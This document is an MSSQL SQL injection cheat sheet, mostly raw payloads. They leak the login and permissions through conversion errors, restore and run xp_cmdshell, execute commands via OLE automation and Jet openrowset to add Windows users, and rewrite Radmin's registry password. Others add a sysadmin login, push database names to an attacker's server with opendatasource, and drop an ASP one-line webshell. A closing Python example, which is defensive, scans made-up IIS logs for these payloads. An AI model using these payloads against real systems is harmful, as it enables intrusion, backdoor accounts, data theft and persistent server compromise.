// Check the permissions (is the current user a member of db_owner?)
// Note: the cheat sheet is written as URL payloads; every + below must be sent as %2B, because a raw + in a query string decodes to a space.
and 1=(select IS_MEMBER('db_owner'))
and char(124)+cast(IS_MEMBER('db_owner') as varchar(1))+char(124)=1;--
// Check whether you have access to a database (here: master)
and 1=(select HAS_DBACCESS('master'))
and char(124)+cast(HAS_DBACCESS('master') as varchar(1))+char(124)=1;--
// The second form of each check is error-based: comparing the string '|1|' or '|0|' to an int forces a conversion error that echoes the value between the | characters.
Numeric type (injection point is a bare number, nothing to close)
and char(124)+user+char(124)=0
Character type (close the string literal, then re-open it at the end so the query stays valid)
' and char(124)+user+char(124)=0 and ''='
Search type (injection point sits inside LIKE '%...%')
' and char(124)+user+char(124)=0 and '%'='
// user is an nvarchar; comparing '|name|' with 0 raises a conversion error that leaks the current login name.
Leak the username (same trick without the delimiters; comparing user to 0 raises a conversion error containing the login name)
and user>0
' and user>0 and ''='
Check whether the login is sysadmin (sa)
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and char(124)+cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1;--
// 0x7300...6E00 is 'sysadmin' as UCS-2 (little-endian); useful when single quotes are filtered.
Check whether the backend is MSSQL (sysobjects exists only there)
and exists(select * from sysobjects);--
Check whether stacked (multi-statement) queries are supported
;declare @d int;--
Restore xp_cmdshell (SQL Server 2000, after the extended procedure has been dropped; xplog70.dll must still be present)
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
Query a remote SQL Server through openrowset (server, login and password here are the page's placeholders):
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
// Execute commands
//-----------------------
Via the Jet engine. First enable sandbox mode in the registry:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Then run the system command through the Jet OLE DB provider (shell() is evaluated by the Jet engine, so it runs in the SQL Server service context):
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
Via OLE automation (sp_oacreate / sp_oamethod, needs sysadmin):
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\winnt\system32\cmd.exe /c net user paf pafpaf /add';--
Via xp_cmdshell:
exec [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
Determine whether the xp_cmdshell extended stored procedure exists (xtype 'x' = extended stored procedure):
http://www.0daynet.com/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
Write to the registry (REG_DWORD shown; REG_SZ works the same way for string values)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Read the registry
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
List directory contents (depth 1, include files)
exec master..xp_dirtree 'c:\winnt\system32',1,1
Database backup (writes an arbitrary file to disk as the service account)
backup database pubs to disk='c:\123.bak'
// Burst the row count of a table (error-based; the count comes back in the conversion error between the two | characters)
and (select char(124)+cast(count(1) as varchar(8000))+char(124) from D99_Tmp)=0;--
To change the sa password:
exec sp_password NULL,'newpassword','sa'
Add a login and make it sysadmin (test / ptlove are the page's placeholder credentials):
exec master.dbo.sp_addlogin 'test','ptlove'
exec master.dbo.sp_addsrvrolemember 'test','sysadmin'
Drop the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'
Register an extended stored procedure from an arbitrary DLL and expose it to everyone:
exec [master]..sp_addextendedproc 'xp_proxiedadata','c:\winnt\system32\sqllog.dll'
grant exec on xp_proxiedadata to public
Stop or start a service (here the Task Scheduler service)
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
Lists only the subdirectories of a directory.
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
dbo.xp_makecab
Compresses several files into one cabinet file. Every file to be compressed is appended to the parameter list, separated by commas:
dbo.xp_makecab 'c:\test.cab','mszip',1,'C:\Inetpub\wwwroot\SQLInject\login.asp','C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
xp_terminate_process
Kills a running program given its process ID. In Task Manager choose "View" > "Select Columns" to display the PID of each process.
xp_terminate_process 2484
xp_unpackcab
Extracts a cabinet file.
xp_unpackcab 'c:\test.cab','c:\temp',1
Scenario: a machine with Radmin installed, but the password has been changed, regedit.exe has been deleted or renamed and net.exe does not exist, so a registry file cannot be imported with regedit /e. If MSSQL runs with sa privileges, the registry can be written from SQL instead:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c
This sets the Radmin password to 12345678 (the binary value is the page's, i.e. the stored hash for that password). To change the listening port:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Port','REG_BINARY',0xd20400
This sets the port to 1234 (0x04d2 stored little-endian).
// On the attacker's own SQL Server, prepare a database and tables to receive exfiltrated data
create database lcx;
create table ku (name nvarchar(256) null);
create table biao (id int null, name nvarchar(256) null);
// Obtain the database names: push them out of the target to the attacker's server with opendatasource (address, port and credentials are the page's placeholders)
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
// Create a table in master to check permissions (only succeeds with sufficient rights)
create table master..D_TEST (id nvarchar(4000) null, data nvarchar(4000) null);--
Use sp_makewebtask to write a one-line ASP webshell straight into the web directory (decoded form; send spaces as %20 and % as %25 in the URL):
http://www.bkjia.com/dblogin123.asp?username=123;exec sp_makewebtask 'd:\www\t88.asp','select ''<%execute(request("a"))%>''';--
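The command-execution payloads (xp_cmdshell, sp_oacreate, the Jet openrowset trick, xp_regwrite) and the sp_makewebtask webshell drop above all leave a recognisable trace in the web server's request log. The following added example, which is not part of the original sheet, runs a small signature set over constructed IIS W3C log lines that carry those payloads. The log lines, IP addresses and paths are made up for the example; the point it demonstrates is that the query must be URL-decoded before matching (the sheet's %2B becomes + only after decoding) and that a bare keyword match is too loose, which the sp_oacreate search on the last line shows.

```python
"""Signature scan of IIS W3C log lines for the MSSQL injection payloads on this sheet.
Added example; SAMPLE_LOG is constructed, not real traffic."""
import re
import urllib.parse

# Constructed IIS W3C lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# IIS writes the query with spaces percent-encoded, so the line splits cleanly on spaces.
SAMPLE_LOG = """\
2023-04-01 10:00:01 10.0.0.5 GET /display.asp keyno=188 200
2023-04-01 10:00:02 10.0.0.9 GET /display.asp keyno=188%20and%201=(select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell') 500
2023-04-01 10:00:03 10.0.0.9 GET /display.asp keyno=188;exec%20master..xp_cmdshell%20'cmd%20/c%20md%20c:\\1111';-- 500
2023-04-01 10:00:04 10.0.0.9 GET /dblogin123.asp username=123;exec%20sp_makewebtask%20'd:\\www\\t88.asp','select%20''<%25execute(request("a"))%25>''';-- 200
2023-04-01 10:00:05 10.0.0.9 GET /display.asp keyno=188%20and%20char(124)%2Buser%2Bchar(124)=0 500
2023-04-01 10:00:06 10.0.0.7 GET /search.asp q=sp_oacreate+tutorial 200
"""

# Signatures run on the DECODED query. Order matters only for the order of names reported.
SIGNATURES = {
    "xp_cmdshell":      re.compile(r"xp_cmdshell", re.I),
    # require the exec keyword so that a search for "sp_oacreate tutorial" is not flagged
    "ole_automation":   re.compile(r"\bexec\s+sp_oa(create|method)\b", re.I),
    "openrowset":       re.compile(r"\bopen(rowset|datasource)\s*\(", re.I),
    "sp_makewebtask":   re.compile(r"\bsp_makewebtask\b", re.I),
    "registry_xp":      re.compile(r"\bxp_reg(read|write)\b", re.I),
    "error_based_pipe": re.compile(r"char\(124\)\s*\+", re.I),
    "stacked_query":    re.compile(r";\s*(exec|declare)\b", re.I),
}


def parse_iis_line(line):
    """Split one W3C line into its fields and URL-decode the query (+ and %2B both handled)."""
    parts = line.split(" ")
    if len(parts) < 7:
        return None
    date, time, ip, method, stem, query, status = parts[:7]
    return {"ip": ip, "stem": stem, "query": urllib.parse.unquote_plus(query), "status": status}


def match_signatures(decoded_query):
    """Names of every signature that fires on an already-decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_query)]


def scan_log(text):
    """Return (client ip, uri stem, [signature names]) for every flagged line."""
    hits = []
    for line in text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        names = match_signatures(rec["query"])
        if names:
            hits.append((rec["ip"], rec["stem"], names))
    return hits


if __name__ == "__main__":
    for ip, stem, names in scan_log(SAMPLE_LOG):
        print(ip, stem, ", ".join(names))
```

The 500 status on most flagged lines is the conversion error the error-based payloads rely on; a source IP that alternates 500s with payloads like these is worth more attention than any single signature hit. The xp_cmdshell check on the second line is only a probe, but it is flagged too, since the existence query itself is injected SQL.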
// Update table content
update films set kind='Dramatic' where id=123
// Delete content
delete from table_name where stockid=3